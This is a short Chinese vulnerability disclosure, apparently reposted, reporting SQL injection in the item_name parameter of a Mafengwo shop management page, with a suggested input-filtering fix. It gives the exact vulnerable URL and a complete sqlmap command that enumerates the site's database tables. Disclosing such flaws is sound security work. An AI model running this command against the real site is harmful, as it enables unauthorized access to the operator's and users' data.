蚂蜂窝主站SQL注入漏洞可致数据库信息泄露 SQLMAP 验证(仅演示取得数据表名称,仅为证明危害,不再继续深入)
漏洞位置:
http://www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597
参数item_name没有过滤
SQLMAP 跑表演示
注意是用 level 5 测试的,复现漏洞时别忘了
C:\Users\Administrator>sqlmap.py -u "www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597" -p item_name --tables --dbms=mysql --technique T --level 5
修复方案:
过滤所示参数,严格控制用户输入
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;